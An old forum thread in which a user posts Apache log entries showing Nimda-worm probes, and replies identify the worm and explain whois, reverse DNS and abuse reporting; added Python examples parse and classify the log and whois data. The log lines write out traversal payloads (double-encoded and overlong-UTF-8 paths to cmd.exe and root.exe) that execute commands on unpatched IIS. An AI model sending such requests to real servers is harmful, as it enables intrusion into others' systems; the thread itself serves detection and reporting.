Hack attempt on Apache, isn't it?

charly
12-15-2003, 07:52 PM
Greetings,

I thought I could have a look at my logs and found the following:

Seems my visitor thought he was attacking IIS.
I'd like to have some fun:

How can I know which provider gives which span of IPs?
How could I set up my iptables to log these attempts to another file
where, for instance, a daemon could try a reverse DNS on the IP and
save the data.

Provider + IP + date, if the IP is not spoofed -> funny report, isn't it?

Your comments are most welcome since I'm keen on networks but not
skilled yet (hey, with time and dedication).

80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:31 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:32 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:35 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:36 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:37 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:40 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:43 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:44 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:45 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"

 
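The log above is what a defender wants to turn into a one-screen summary before deciding whether to report it. The following is an added example (not code from the thread): it parses Apache "combined" log lines, names the evasion technique each request uses (double percent-encoding such as %255c, or the overlong UTF-8 sequences such as %c0%af that IIS once decoded), counts them per source address, and derives the in-addr.arpa name a reverse lookup would query. The log lines in it are copied from the post; the 192.0.2.10 request is a constructed benign line to show that ordinary traffic is ignored.

```python
"""Spot IIS-style probes (Nimda/Code Red family) in an Apache combined log.

Added example, not code from the thread. The 80.11.161.201 lines are copied
from the post above; the 192.0.2.10 line is constructed (benign request).
"""
import re
import urllib.parse
from collections import Counter

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Windows binaries that no request to a Unix Apache host should ever name.
PROBE_TARGETS = ("cmd.exe", "root.exe")
# A %XX escape that survives one round of decoding means the path was encoded twice.
ENCODED_RE = re.compile(rb"%[0-9A-Fa-f]{2}")

SAMPLE_LOG = """\
80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:40 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
192.0.2.10 - - [04/Dec/2003:18:10:01 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Fields of one combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(path):
    """Name the evasion technique in a request path; None for paths that name no probe target."""
    if not any(t in path.lower() for t in PROBE_TARGETS):
        return None
    once = urllib.parse.unquote_to_bytes(path)  # one round of %XX decoding, as bytes
    # 0xC0/0xC1 can never start a valid UTF-8 sequence; IIS once accepted them as
    # overlong encodings of '/' and '\' (e.g. %c0%af), which is what these probes rely on.
    if any(b in (0xC0, 0xC1) for b in once):
        return "overlong-utf8 traversal"
    if ENCODED_RE.search(once):  # e.g. %255c -> %5c, %%35%63 -> %5c (Apache answered 400 to that one)
        return "double-encoded traversal"
    return "traversal" if b".." in once else "direct probe"


def fully_decoded(path):
    """Decode twice and render as latin-1 so the ..\\.. the sender meant becomes visible."""
    twice = urllib.parse.unquote_to_bytes(urllib.parse.unquote_to_bytes(path))
    return twice.decode("latin-1")


def ptr_name(ip):
    """The in-addr.arpa name that host/nslookup query for a reverse lookup of an IPv4 address."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() for o in octets):
        raise ValueError("IPv4 dotted quad expected: %r" % ip)
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def summarize(lines):
    """Per source IP: technique counts, first/last timestamp (lines assumed in log order),
    and the PTR name to resolve before writing the abuse report."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        kind = classify(rec["path"]) if rec else None
        if kind is None:
            continue
        entry = report.setdefault(rec["ip"], {
            "first": rec["ts"], "last": rec["ts"],
            "techniques": Counter(), "ptr": ptr_name(rec["ip"])})
        entry["last"] = rec["ts"]
        entry["techniques"][kind] += 1
    return report


if __name__ == "__main__":
    for ip, e in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} ({e['ptr']}): {e['first']} .. {e['last']}")
        for kind, n in e["techniques"].most_common():
            print(f"  {n:3d}  {kind}")
```

Run it against a real access log with `summarize(open(path))`; the classification works on bytes after a single decode on purpose, since deciding by string matching after a full decode would make %255c and a plain %5c indistinguishable, and the difference is exactly what tells you the sender was aiming at IIS's double-decoding bug rather than at Apache.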
 
 
 
 
Michael Heiming
12-15-2003, 08:02 PM
charly <(E-Mail Removed)> wrote:
> Greetings,

> I thought I could have a look at my logs and found the following:

> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun:

Pretty lame.

> How can I know which provider gives which span of IPs?

inetnum: 80.11.161.0 - 80.11.161.255
netname: IP2000-ADSL-BAS
descr: BSREI105 Reims Bloc2
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send mail to
remarks: (E-Mail Removed) AND (E-Mail Removed)
[..]

Hint:
man whois

--
Michael Heiming

Remove +SIGNS and www. if you expect an answer, sorry for
inconvenience, but I get tons of SPAM
 
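Turning that whois object into something a firewall rule or an abuse report can use takes a little parsing. The following is an added example (not code from the thread or from any whois client): it parses RIPE-style "attribute: value" objects, converts the "inetnum" range into CIDR blocks, and answers the question asked above, which block owns a given address. The first object is the whois output quoted in the reply (mailboxes removed by the forum, the wrapped "remarks" line joined); the second object is a constructed record for the documentation range 192.0.2.0/24 and is not a real allocation.

```python
"""Map an address to the registry block that covers it from RIPE-style whois output.

Added example, not code from the thread. First object: quoted from the reply above.
Second object: constructed for illustration (192.0.2.0/24 is reserved for documentation).
"""
import ipaddress
import re

WHOIS_TEXT = """\
inetnum: 80.11.161.0 - 80.11.161.255
netname: IP2000-ADSL-BAS
descr: BSREI105 Reims Bloc2
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send mail to
remarks: (E-Mail Removed) AND (E-Mail Removed)

inetnum: 192.0.2.0 - 192.0.2.255
netname: EXAMPLE-DOC-NET
descr: constructed record for illustration only
country: ZZ
status: ASSIGNED PA
"""

# RIPE objects are "attribute: value" lines; blank lines separate objects.
ATTR_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")


def parse_objects(text):
    """Split whois output into objects, each a dict of attribute -> [values] (attributes may repeat)."""
    objects, current = [], {}
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if m:
            current.setdefault(m.group(1), []).append(m.group(2).strip())
        elif current:
            objects.append(current)
            current = {}
    if current:
        objects.append(current)
    return objects


def inetnum_networks(obj):
    """'inetnum: A - B' as the minimal list of CIDR blocks, the form an iptables rule or ACL wants."""
    first, last = (ipaddress.ip_address(p.strip()) for p in obj["inetnum"][0].split("-"))
    return list(ipaddress.summarize_address_range(first, last))


def owner_of(ip, objects):
    """(netname, [cidr strings]) of the object whose inetnum covers ip, or None if none does."""
    addr = ipaddress.ip_address(ip)
    for obj in objects:
        nets = inetnum_networks(obj)
        if any(addr in n for n in nets):
            return obj["netname"][0], [str(n) for n in nets]
    return None


def abuse_remarks(obj):
    """The 'remarks' lines, which is where this object tells you to send hacking/spam reports."""
    return obj.get("remarks", [])


if __name__ == "__main__":
    objs = parse_objects(WHOIS_TEXT)
    for ip in ("80.11.161.201", "192.0.2.10", "198.51.100.7"):
        print(ip, "->", owner_of(ip, objs))
    print("\n".join(abuse_remarks(objs[0])))
```

Feed it the output of `whois <address>` saved to a file; ranges that are not aligned on a power of two (say, 80.11.161.0 - 80.11.162.127) come back as several CIDR blocks rather than one, which is why the function returns a list.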
 
charly
12-15-2003, 08:32 PM
Thank you.

I knew about whois but it didn't work when I tried: strange.

Anyway, I consider it an opportunity to study things about networks.

Question:

Given:
an IP address,
it's alive when I spot it,
it's not a proxy,

what can I do except a whois?

Maybe I should swap to c.o.l.networking (tell me, I don't want to bother
you).

Thanks

 
 
Jem Berkes
12-16-2003, 12:48 AM
> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun:

> 80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"

Well, this is now in the category of classic junk MS traffic; this crap has
been floating around the Internet for years. It comes from hacked Windows
servers that are automatically looking for other Windows servers to hack
(no shortage of these around).

The owner of this IP is probably 100% oblivious to the behaviour of his
host. If you want to take the effort, you can contact the ISP of the owner
using the Whois tool at http://openrbl.org/

--
Jem Berkes
http://www.sysdesign.ca/
 
 
Eric
12-16-2003, 06:17 AM
charly wrote:

> Greetings,
>
> I thought I could have a look at my logs and found the following:
>
> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun:
>
> How can I know which provider gives which span of IPs?
> How could I set up my iptables to log these attempts to another file
> where, for instance, a daemon could try a reverse DNS on the IP and
> save the data.
>
> Provider + IP + date, if the IP is not spoofed -> funny report, isn't it?
>
> Your comments are most welcome since I'm keen on networks but not
> skilled yet (hey, with time and dedication).
>
> [..]

It's the Nimda worm; report the IPs to whoever the ISP is that owns the
block.
# host 80.11.161.201
201.161.11.80.in-addr.arpa domain name pointer
AReims-105-1-7-201.w80-11.abo.wanadoo.fr.
or
# nslookup -silent 80.11.161.201
;; Got SERVFAIL reply from 127.0.0.1, trying next server
Server: 207.217.77.82
Address: 207.217.77.82#53

Non-authoritative answer:
201.161.11.80.in-addr.arpa name =
AReims-105-1-7-201.w80-11.abo.wanadoo.fr.

Authoritative answers can be found from:
161.11.80.in-addr.arpa nameserver = ns2.wanadoo.fr.
161.11.80.in-addr.arpa nameserver = ns.wanadoo.fr.
ns2.wanadoo.fr internet address = 193.252.19.11

Eric
 
 
Michael Heiming
12-16-2003, 02:30 PM
charly <(E-Mail Removed)> wrote:
[..]
> Given:
> an IP address,
> it's alive when I spot it,
> it's not a proxy,

> what can I do except a whois?

Depends on the (if any) firewalls between you and the target
system; the question is what do you want to do and why?

--
Michael Heiming

Remove +SIGNS and www. if you expect an answer, sorry for
inconvenience, but I get tons of SPAM
 
 
John Thompson
12-16-2003, 05:06 PM
On 2003-12-15, charly <(E-Mail Removed)> wrote:

> I thought I could have a look at my logs and found the following:
>
> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun:
>
> How can I know which provider gives which span of IPs?
> How could I set up my iptables to log these attempts to another file
> where, for instance, a daemon could try a reverse DNS on the IP and
> save the data.
>
> Provider + IP + date, if the IP is not spoofed -> funny report, isn't it?
>
> Your comments are most welcome since I'm keen on networks but not
> skilled yet (hey, with time and dedication).
>
> [..]

[clip...]

That's the Nimda worm. The machine on the other end is infected, even
though a patch to prevent this has been available for over 2 years
now:

http://www.cert.org/advisories/CA-2001-26.html

There ought to be a way to take machines like that clean off the 'net.

--

-John ((E-Mail Removed))
 